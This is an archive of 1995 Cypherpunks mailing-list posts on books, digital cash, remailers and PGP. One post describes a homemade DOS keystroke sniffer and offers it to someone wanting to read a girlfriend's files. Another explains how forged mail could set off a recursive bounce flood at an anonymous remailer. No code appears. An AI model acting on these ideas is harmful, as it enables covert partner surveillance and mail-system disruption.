counted among the philanthropic `whodunits.' These are the anonymous gifts, and Communique would like to profile several innovative projects that one anonymous donor helped launch this year. According to the donor, anonymity provides greater freedom to `pick and choose' projects that are personally interesting. This donor is particularly attracted to programs that involve computer technology or promise to generate benefits beyond the scope of the immediate project. [...] The same donor who declined recognition for these high-tech projects also provided support for 24 high school juniors from Boys Harbor in Harlem to attend the six-week Cornell Summer College Program in 1994, as well as the two previous summers. [...] Although this anonymous donor may not be interested in getting a name on something, he certainly leaves an indelible mark on the quality of education at Cornell." Closer to home, our dept. chair Dave Stemple broadcast a request for donations to an anonymous recipient: "One of our undergrad majors lived in Amherst Crossings, which burned down last week. As a result this student, a senior who had planned to graduate this spring, is destitute and needs help or he will be unable to complete his degree. If you would like, you can contribute clothes or money (cash only please in order to maintain the student's anonymity) to him. [...]" Incidentally, I received my B&W C'punks shirt from Kevin Prigge a few weeks ago, and consider myself a very satisfied customer. I made a point of wearing it on the flights both ways for a recent vacation I took in California. On the return trip, I was delayed at O'Hare for over an hour due to a leaky window on the airplane. A man in his 50s or 60s approached me and asked, with a smirk, what a Cypherpunk was. I explained a bit, mentioning the passage of the DT bill. Noting the mention of the NSA on the shirt, the man mentioned that his son is working at Apple "with the NSA".... -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwyA6mf7YYibNzjpAQFENAQA09JTWr501ZJliFWK4efY8py2OhgBq8gy rqYvrGX+EZ49Uq+IDU2DjiiPBHuYPOE23wb/QfouhmKaSSUMqifYTd+uau247Cot CC+CYceBvH3oK35oTr7CahSqb4JLUNs4atOkoYtpbYPG5qrR8yJkAGBKbVzQZHKt ioUFB5xhYKA= =QD4b - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwyB+CoZzwIn1bdtAQEgkAF+OBkRShMO+Et/Kr8AkPXPz564xgNnhzfP WPSO0W0UCpkg/e7bQIliMCXiyzp7nHQr =1IBd -----END PGP SIGNATURE----- From chen at intuit.com Thu Jan 5 15:31:01 1995 From: chen at intuit.com (Mark Chen) Date: Thu, 5 Jan 95 15:31:01 PST Subject: RSADSI Conference - Extra Passes? Message-ID: <9501052330.AA15736@doom.intuit.com> A cohort of mine is in need of a pass to next week's RSADSI conference, which, unfortunately, is sold out. So if anyone has a pass that they're not planning to use for a half-day or so, please drop me an e-mail and I will be in your debt. Thanks! -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From blane at seanet.com Thu Jan 5 16:01:25 1995 From: blane at seanet.com (Brian Lane) Date: Thu, 5 Jan 95 16:01:25 PST Subject: True Names In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Angus Patterson wrote: > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. Go your local library and request it. Here in the states they will search all over for you. I had a paperback copy in about 3 weeks. Excellent book I might add. Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From ddt at lsd.com Thu Jan 5 16:13:34 1995 From: ddt at lsd.com (Dave Del Torto) Date: Thu, 5 Jan 95 16:13:34 PST Subject: C-LIT: Vernor Vinge's "A Fire Upon the Deep" (was: Re: True Names) Message-ID: At 1:48 pm 1/5/95, Angus Patterson wrote: >I've been trying to get True Names by Vernor Vinge, and have been told it's >out of print (like most good cypunk ), does anybody have it scanned? >I realize this is without permission, so does anybody have Vinge's address? >(e-mail or otherwise) or could anybody ask him? Btw, does he have any other >crypto/anonymity related stories? Thanks in advance. Amazing that you should mention this, Angus: I *just* finished reading "A Fire Upon the Deep" and it is not only exeedingly gnarly, but also features a universal net, galactic-wide relays and Netscum-like service providers and associated user kvetching, a sinister-billions-of-years-old-AI-virus, newsgroups, lists populated by aliens - and even _crypto_ as the key to the whole shebang. There's also a great futuristic "dig" on pub key encryption buried in it. Neural net stuff. A possible explanation for the existence of both God and Newt Gingrich...and I could go on. Great read, true anus-clenching adventure... and this from one who does NOT normally read anything more sci-fi than certain software manuals. :) Strongly recommended for c-punks who can last 600 pages (after the first ten, you're hopelessly hooked if you have half a brain left afdter reading this list for a year or two). I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze mail me. First book of his I've read, first of it's kind I've enjoyed in a very long time. I'll scan my favorite crypto-related (legal-length) excerpt and post it next week, howzat? dave _________________________ Big books small Books high books tall Just give me a good Little book, That's all. -Truman Capote (age 11) C-LIT = Cypherpunk LITerature. Gitcher mind outta the gutter there, Lancelot. From wcs at anchor.ho.att.com Thu Jan 5 16:27:02 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 5 Jan 95 16:27:02 PST Subject: ecash trial issues explained Message-ID: <9501060025.AA06458@anchor.ho.att.com> > From: Wolfgang Roeckelein > > >-> Digital cash should not be "anonymous" -- paper currency isn't. Serial > > There seems to be a misconception here what is meant with anonymous. Paper cash > is anonymous: I can't derive the person I got the note from from the note > itself. So if I meet a guy in the street, he gives me a pack of cigarettes and > I give him cash, this transaction is anonymous. It isn't difficult to make paper cash less anonymous, though, by tracking serial numbers. This is occasionally done in "law enforcement" situations - recording the notes used to pay ransom or bribes. It wouldn't be difficult to add serial-number recording equipment/mechanisms to automatic bank-teller machines, to record what serial numbers would be given out to whom. (This can be done either by adding scanners to the ATMs themselves, or by scanning the money before putting it into the ATM, and having the ATM record that transaction #43 dispensed the 105th-110th bills in the stack. Scanning can either be done by OCRs, or by replacing the human-readable numbers with bar-codes, as some of the paranoids periodically suggest the US Treasury is about to do as part of some heinous plan. However, the original posters' assertion that digital cash should not be anonymous is not a technical statement, it's a value judgement, and in my opinion it's a bad one. There are a lot of genuine social needs that anonymity can support, and a lot of bad things that can be done with traceable money. Aside from that, traceability costs money. Original gold and silver money didn't need to be traceable, though coiner's and assayer's marks were useful, and it is easier to keep track of your pile of gold bars if they're numbered. But paper money has serial numbers largely to prevent easy copying; gold is a lot harder to counterfeit, unless you've got a king who insists that coins with his face on them should be worth N times as much as anonymous coins. Bill From nelson at crynwr.com Thu Jan 5 16:27:39 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 16:27:39 PST Subject: Remailer postage In-Reply-To: <199501052148.NAA07203@netcom5.netcom.com> Message-ID: From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 1995 13:48:34 -0800 (PST) (I understand that Russ Nelson has experience in the shareware business, so he may know how many people send in their voluntary contributions. My understanding is that it's a tiny fraction, and that few shareware authors ever make much money. I've talked to some of them, and they consider shareware a failed experiment, except for new products trying to break into crowded markets, where the "shareware" label is just a facade for essentially giving it away in exchange for fame and eventual fortune if the product goes commercial.) Shareware is essentially begging, yes. Far better to just give the software away to create a need for your services. Then people are actually getting something for their money. Selling services is profitable, particularly if you can sell the same service to multiple people at the same time. If you're very good at selling, you can even sell a service as an insurance plan. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From rah at shipwright.com Thu Jan 5 16:32:59 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 16:32:59 PST Subject: GIF_nip Message-ID: > Watch your Cc: headers, s'vous plait? AAK! Eudora's "reply-to-all" strikes again! Grovelling in your general direction, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From blancw at microsoft.com Thu Jan 5 16:47:41 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 5 Jan 95 16:47:41 PST Subject: True Names Message-ID: <9501060048.AA11061@netmail2.microsoft.com> From: Timothy C. May I see copies in used bookstores often. It's in the collection "True Names and Something-or-other" and was in print until recenly. I also have the Bluejay edition, with an afterward by Marvin Minsky. .............................................................. I bought one at Half-Price Books. I don't know what edition it is, it's a dingy little paperback with a signature in it of some stranger that I wouldn't know. I keep it with my "previously owned" collection. Blanc From entropy at IntNet.net Thu Jan 5 16:58:57 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 5 Jan 95 16:58:57 PST Subject: Remailer Abuse In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com> Message-ID: > Anonymous remailers pretty much require anonymous digital cash, > although this could be built on top of some other electronic > payment system with somewhat less payment lag and reversability > than FV. Perhaps if the people at DigiCash had seen fit to give me the beta client and server software I could attempt to implement such a beast. Unfortunately, I don't meet their critera. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Thu Jan 5 17:02:26 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 5 Jan 95 17:02:26 PST Subject: your mail In-Reply-To: Message-ID: > >* Hackers have successfully compromised 350 DoD computer systems If the DoD includes the various branches of service {Army, Navy, etc.} that number is grossly inaccurate. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jim at acm.org Thu Jan 5 17:07:10 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 5 Jan 95 17:07:10 PST Subject: True Names In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com> Message-ID: <199501060107.RAA18958@mycroft.rand.org> > Blanc Weber writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recenly. I also "True Names and Other Dangers" -- I think it's a Baen edition. > have the Bluejay edition, with an afterward by Marvin Minsky. Me too, and I also have the first published version, which is in "Binary Star #5" with "Nightflyers" by George R. R. Martin. Great book -- I want to be a cybergod when I grow up. Jim Gillogly 15 Afteryule S.R. 1995, 01:06 From grendel at netaxs.com Thu Jan 5 17:22:42 1995 From: grendel at netaxs.com (Michael Handler) Date: Thu, 5 Jan 95 17:22:42 PST Subject: True Names In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com> Message-ID: Timothy C. May writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recenly. "True Names and Other Dangers", if anyone's trying to mail order it. --Mike, still looking for a copy himself From sinclai at ecf.toronto.edu Thu Jan 5 17:40:39 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Thu, 5 Jan 95 17:40:39 PST Subject: DES for HP48 Message-ID: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu> There used to be some code on soda to do DES on an HP48 palmtop/calculator. I looked this afternoon, on ftp.csua.berkeley.edu, and I couldn't find it. Anyone know where it got to? From blancw at microsoft.com Thu Jan 5 17:50:45 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 5 Jan 95 17:50:45 PST Subject: True Names Message-ID: <9501060151.AA16068@netmail2.microsoft.com> From: Jim Gillogly > Blanc Weber writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recenly. I also ............................................................. No, No, Jim, that wasn't me saying that - that statement was made by a cpunkgod. Mine was beneath it. Blanc From rah at shipwright.com Thu Jan 5 18:01:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 18:01:33 PST Subject: floating point crypto? Message-ID: I'm incensed. I casually mentioned somewhere else that I saw something on this list about floating-point math being used in crypto, contrary to popular belief, and somebody had the *timerity* to call me on it. ;-). I think it had to do with factoring, but maybe even in key-generation, though that doesn't sound right at all... So, are there c-punk archives I could look in? I remember hearing something about that, too. However, if someone remembers off the top of their head, or if they have an actual copy of the posting, that would be great, too. Please send me whatever it is by e-mail. No point cluttering the list more than I already have... Of all the nerve.... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From tcmay at netcom.com Thu Jan 5 18:56:29 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 18:56:29 PST Subject: floating point crypto? In-Reply-To: Message-ID: <199501060251.SAA26936@netcom13.netcom.com> Robert H. has asked that we reply in e-mail to him, to avoid "cluttering the list more than I already have...," but the logic of this is faulty. The few lines of a response such as this one, or even of several such responses, are as nothing compared to dozens or more people sifting their own archives so they can each independently send Robert what they find. Hence my public reply. Robert Hettinga wrote: > I casually mentioned somewhere else that I saw something on this list about > floating-point math being used in crypto, contrary to popular belief, and > somebody had the *timerity* to call me on it. ;-). > > I think it had to do with factoring, but maybe even in key-generation, > though that doesn't sound right at all... The thread was "Pentium bug and CRYPTO," and it hit on 1994-11-21 and lasted a few days. Posts by Derek Atkins, Mike Duvos, and others stated persuasively that no floating point operations are included in PGP, that no FP coprocessor is needed or used for PGP, and that the Pentium bug could not affect PGP. (In another thread, which I have no intention of trying to dig up now, though I recall either Norm Hardy or Hal Finney was one of those to comment, it was noted that some clever uses of floating point hardware can help with ostensibly integer-only computations. But PGP, as noted above, does not do this, and I expect this trick is not common.) > So, are there c-punk archives I could look in? I remember hearing something > about that, too. > > However, if someone remembers off the top of their head, or if they have an > actual copy of the posting, that would be great, too. > > Please send me whatever it is by e-mail. No point cluttering the list more > than I already have... (I will send Robert several of these article, so others don't have to. Game theory and all that good stuff.) > > Of all the nerve.... Not to sound strident, but if folks would keep copies of articles and spend some time organizing them in data bases or in other searchable forms, this would help the list. In my opinion, having personal access to past posts is several orders of magnitude more important than having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R Us" in the correct font and with the "R" reversed according to spec. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Thu Jan 5 20:43:54 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 5 Jan 95 20:43:54 PST Subject: DES for HP48 In-Reply-To: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu> Message-ID: <199501060443.UAA19367@largo.remailer.net> From: SINCLAIR DOUGLAS N There used to be some code on soda to do DES on an HP48 palmtop/calculator. ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/misc/des.hp48sx.gz Eric From carolann at vortex.mm.com Thu Jan 5 19:57:05 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 1995 21:57:05 -0600 Subject: No Subject Message-ID: <82e47b32bd189967ee9a205e1d1602de@NO-ID-FOUND.mhonarc.org> [icicle.winternet.com] Login name: carolann In real life: CarolAnne Braddock Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern New mail received Thu Jan 5 21:16:23 1995; unread since Mon Jan 2 13:18:25 1995 Plan: This account has been disabled permanently. Mike Horwath - Admin - Winternet - drechsau at winternet.com From harmon at tenet.edu Thu Jan 5 22:54:18 1995 From: harmon at tenet.edu (Dan Harmon) Date: Thu, 5 Jan 95 22:54:18 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park In-Reply-To: <199501040551.VAA12193@netcom13.netcom.com> Message-ID: Another book that has not been mentioned is "Alan Turing the Enigma" by Andrew Hodges. It gives, what I think, is a good analysis of Turing's work, alot of which is still classified, what role Hut 6 played (theater traffic analysis, bombe development, and other projects after Hut 6) , and his subquent role in the development computing. Hodges does a good job of putting Turing in historical and mathematical/cryptological perspective. Alas, like some of the books that are sugguested, it is recently out of print ( look for it in the remainder/used book stores). Dan From m00012 at KANGA.STCLOUD.MSUS.EDU Thu Jan 5 22:58:49 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Thu, 5 Jan 95 22:58:49 PST Subject: sniff passwords on PC (DOS) Message-ID: <0098A089.4C425900.550@KANGA.STCLOUD.MSUS.EDU> As a demonstration of concept, I wrote a small, simple program that replaces the keyboard interrupt and stores all keystrokes in a buffer. It was very very easy to write. It works while using pgp and windows\net. It does not work after starting windows. Not sure, but it seems obvious that MS windows installs it's own keyboard interrupt. I suppose it would be easy to enhance this simple program (I bet it's been done by others) to store passwords into a secret file on a hard drive unbeknownest to the user. I first suspected that such a program already existed after hearing, two days after his arrest, that the CIA had cracked Aldrich Aim's encrypted files. (sorry if I spelled his name incorrectly.) Think about it, the govt. could spend 50,000 to 100,000 to create a freeware gif viewer, for example, that installed such a tsr. Mike P.S. If the guy who wanted to see his gf's files writes me, I'll send you this keyboard sniffer program. From harmon at tenet.edu Thu Jan 5 23:11:22 1995 From: harmon at tenet.edu (Dan Harmon) Date: Thu, 5 Jan 95 23:11:22 PST Subject: Siegel and Lewis In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com> Message-ID: On Wed, 4 Jan 1995, Doug Barnes wrote: > > Why is it that so many cypherpunks like the economist? > > I learned recently that Eric is a big fan. So am I. You're certainly > not the first other cypherpunk to mention this. Weird. I mean, it's > not exactly a radical publication... it just gets its *&#$*#$ facts > right. Probably this is it. > > Doug > The reason is, and I do not presume to speak for other individuals on this list, the Economist looks at the world from an independent (i.e. not owned by one of the major publishing houses, if I'm not mistaken) point of view, and is not afraid to pursue different analysis of a topic. I will also venture that the closest that we have in the US is Forbes. Dan From carolann at mm.com Thu Jan 5 23:55:22 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 95 23:55:22 PST Subject: All I did was properly crosspost! Message-ID: I first saw the Dubois Letter in alt.security.pgp the 28th. PRZ posted it here the next day. I "crossposted" it to my favorite 10 newsgroups. Just 10. Some creep complained. (we'll get to him a bit later). I didn't get a chance to get back on-line for 3 1/2 days. I was lied to. I am hurt. My mail has been stolen. I haven't read any of you for four days now. My web pages are vulnerable. Is there somebody who can please help me get my 2 megs of mail? I can't get at your keys. http://www.winternet.com/~carolann/coffee.html has the cypherpunk rant links on the page. I'm proud of them, and proud to be on this list. But to take my account away for crossposting to 10 groups is not right. I'll be back with a better chronology. Love Always, Carol Anne ps Hope you like (and feel free to use) my new .sig From carolann at mm.com Thu Jan 5 23:59:42 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 95 23:59:42 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: Guess I'm worse than Siegel & Lewis now, huh? On Fri, 6 Jan 1995, Dan Harmon wrote: > On Wed, 4 Jan 1995, Doug Barnes wrote: > > Why is it that so many cypherpunks like the economist? > > I learned recently that Eric is a big fan. So am I. You're certainly > > not the first other cypherpunk to mention this. Weird. I mean, it's > > not exactly a radical publication... it just gets its *&#$*#$ facts > > right. Probably this is it. > > Doug > The reason is, and I do not presume to speak for other individuals on > this list, the Economist looks at the world from an independent (i.e. not > owned by one of the major publishing houses, if I'm not mistaken) point > of view, and is not afraid to pursue different analysis of a topic. > > I will also venture that the closest that we have in the US is Forbes. > > Dan > > From lmccarth at ducie.cs.umass.edu Fri Jan 6 00:02:03 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 00:02:03 PST Subject: public vs. private replies Message-ID: <199501060807.DAA22166@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Tim May writes: > [...] has asked that we reply in e-mail to him, to avoid > "cluttering the list more than I already have...," but the logic of > this is faulty. The few lines of a response such as this one, or even > of several such responses, are as nothing compared to dozens or more > people sifting their own archives so they can each independently send > [...] what they find. Hence my public reply. I'd like to amplify this point, which is missed all too often on Usenet and mailing lists. Replies to requests for fairly widely-known factual information should be directed to the forum (i.e. the mailing list, newsgroup, or what have you). This practice not only prevents duplication of effort by the repliers, as Tim mentioned, but also prevents duplication of effort by others interested in the same answer. I try to make a point of replying to the whole list when someone asks for a list of remailers, mail-news gateways, etc. for precisely this reason. As I see it the basic principle rests on a simple comparison of the number of replies desired with the likely number of replies. If you anticipate getting many more replies than you want, you should ask for replies to the entire forum in which you place the query. Otherwise, seek private email. This is certainly not a perfect heuristic, but it's an excellent starting point IMHO. For example, a few months back I wanted to give away an old AM/FM/ shortwave radio, so I posted to a local newsgroup. I asked for initial public replies, so that I wouldn't be flooded with mail before I had the chance to announce that a recipient had been selected (first-come first-served). After the initial expression of interest, further correspondence continued in private. [...] > In my opinion, having personal access > to past posts is several orders of magnitude more important than > having MIDI-MIME JPEG-II TeX players [...] It takes more disk space from one's personal quota, though (for those who suffer under such restrictions). :[ Let's not head down this road again.... "You've gotta keep `em separated !" -Offspring -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwz5Mmf7YYibNzjpAQEooAQAlj93pc1CuSMTdApaRTg06ONgPkeyqUfY KhdcqzDmEnuWBDdwgO+YtHOHFsOGlPhoFhOijajJzTh97G1TBYn5plBECaZXs1RJ Au9g1uqEAKtFLFYB/jKDaDA/Xzf13irCKb846IAhttKICwQJ8HfLfgPWLHMa1/f1 ldkXYq7DfY8= =7KNc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwz6PCoZzwIn1bdtAQGpbwGAqY6tLm7TAN2TluCpD1WOTsR6kMgI2R27 CMExwcLopwSapiPNO0u/IHnzHUq5ij2C =TyKQ -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Fri Jan 6 00:55:49 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 00:55:49 PST Subject: All I did was properly crosspost! Message-ID: <199501060901.EAA22716@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- [I'm cc:ing this to C. A. Braddock's new address and her ex-sysadmin, in addition to the cypherpunks list. --L. Futplex McCarthy] Carol Anne Braddock writes: > I first saw the Dubois Letter in alt.security.pgp the 28th. > PRZ posted it here the next day. > > I "crossposted" it to my favorite 10 newsgroups. Just 10. Posting letters asking for $$$ is of course a risky venture on Usenet. We see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out your hand, you'd better be doing it in the right place. My frank reaction as a veteran Usenetter is that 10 newsgroups sounds like rather a lot, especially when that presumably excludes the groups like a.s.pgp to which the letter was originally posted. To which 10 newsgroups did you repost the letter ? [...] > Is there somebody who can please help me get my 2 megs of mail? I believe it's questionable whether your old system is under any legal obligation to provide access to your accumulated mail there. As I recall, Netcom ended up deleting most of the deluge of mail Canter & Siegel received after their infamous spam. However, in this instance it does seem that it would be polite (and good P.R.) to give you access to the mail your account has received. Apologize and ask your former admin nicely, and you might well get it. He could move it to an anon-ftp directory, perhaps encrypted with some public key of yours :) [...] > But to take my account away for crossposting to 10 groups is not right. Well, it depends greatly upon what you posted and where. If I posted the PRZ Appeal to *my* ten favorite newsgroups (including alt.config, alt.religion. kibology, and alt.sexual.abuse.recovery), I'd certainly expect to face trouble and perhaps lose posting privileges. [...] > Login name: carolann In real life: CarolAnne Braddock > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > New mail received Thu Jan 5 21:16:23 1995; > unread since Mon Jan 2 13:18:25 1995 > Plan: > This account has been disabled permanently. > > Mike Horwath - Admin - Winternet - drechsau at winternet.com -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0Fu2f7YYibNzjpAQGwoAP/RrXUl3vguSSJSvGDNKsXIMek61Ay5Cvy xFO/NWcyZpzXkqwF3w19DOtke1EQ1NuPP7Z9luN6zF/QkqNwS6Z0mAMc8hcI0kLg F3ESx06UABPJMQoVY63BtaDYuj6Dualjs903koAliIUhpITZ+qsf7jaj3qT1FtMa d3SzHqOWGYM= =876P - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0G3CoZzwIn1bdtAQHTCQGAgs4itNl5sAZMFjgMIx4Gef52o49+4q3k m36gnACMfYDMThQyhcOS8udSMFw3YM4Q =uty3 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Fri Jan 6 01:09:01 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 01:09:01 PST Subject: sniff passwords on PC (DOS) Message-ID: <199501060914.EAA22804@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Mike writes: > days after his arrest, that the CIA had cracked Aldrich Aim's encrypted > files. (sorry if I spelled his name incorrectly.) FYI, I'm fairly sure it's "Aldrich Ames". > Think about it, the govt. could spend 50,000 to 100,000 to create a > freeware gif viewer, for example, that installed such a tsr. ...most of that going to Compu$erve/Uni$y$... > P.S. If the guy who wanted to see his gf's files writes me, I'll send you > this keyboard sniffer program. Just to clarify slightly, the person who originally asked the question (Adam Gerstein aka THE MAC GURU) said he had a _friend_ who wanted to see his (the friend's) gf's files. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0I8mf7YYibNzjpAQEF/wP9GPKLX7KifBFRenzmbvsCdbOQ7Narlm8/ qiW/nSLRr7jZUtjAyhYM71eI9GsQbO6lADfV9ncoPIATNB/eJNCqa2O0cmNa67O/ KuUSQl0NQPiUQyevkLRldllEb9hSuTNeHyJZ4SFDpMbFrGYXX4Iu/w9RYcn9ssNS 29qFs0vNK30= =Z0ZM - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0J9ioZzwIn1bdtAQHXVgF8CVyuTHInzoYDUZmZZXwksIosAuiP4TSh pfZJLbRcoPPP9sJ63CTfnexZXenEzhLf =zrNo -----END PGP SIGNATURE----- From carolann at mm.com Fri Jan 6 01:21:47 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 01:21:47 PST Subject: We still don't have the mailbox. In-Reply-To: Message-ID: Thanks Doc. Wrote Phil Dubois, Zimmy's Lawyer. It's something I'll show you a copy of when I get back to playing "catch-up". Love Always, Carol Anne On Fri, 6 Jan 1995, Thaddeus Ozone wrote: > Carol, > I DL'd the whole thang. If it was world-readable, I've got it locked up on > my hard drive. I'll have to wait until I can get my hands on some 800k > disks, it takes up 1776k on my hard drive, but should fit on 2 - 800k's > once it gets transferred. I took the liberty of taking EVERYTHING that was > readable, including what was in the main directory. Talk to you over the > weekend. > Your pal, -doc- > > >I tried again, even from my pages. > >I do believe it's the local server that's gotta do the job. > >Anyway, I'm bookmarking all the links. > >And downloading all the pages. > >Will go ftp here in a minute. > > > >Love Always, > > > >Carol Anne > >more in about an hour. > > > From lmccarth at ducie.cs.umass.edu Fri Jan 6 02:05:21 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 02:05:21 PST Subject: Chain letter bounced (fwd) Message-ID: <199501061011.FAA23248@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- A small advisory: since na166182 at anon.penet.fi is subscribed to the c'punks list, and anon.penet.fi attempts to filter out instances of Make Money Fast, any mention of "MAKE.MONEY.FAST" on the list will likely generate an autoreply like the one below. It appears that a copy of the MAKE.MONEY.FAST FAQ (there, I've said it again :) included in the autoreply will even trigger this mechanism, which is awfully ironic at best. At worst, this self-referential property seems liable to allow some nasty email feedback loops. Offhand it appears that a message with an address @anon.penet.fi (preferably forged) in the From: line, and "MAKE.MONEY.FAST" as the message body, would launch an automatic recursive bounce process as anon.penet.fi attempts to send itself a message it considers illegal. Presumably this would crash when the disk quota on some mail spool somewhere is exceeded. If the message was forged to come From: cypherpunks at toad.com or another list to which an anon.penet.fi user is subscribed, I imagine the list would have the dubious privilege of witnessing all the recursive bounce messages along the way. I'm not volunteering to try to write a better MMF-recognizer for a.p.f, though.... Forwarded message: > From daemon at anon.penet.fi Fri Jan 6 04:22:39 1995 > To: lmccarth at ducie.cs.umass.edu > 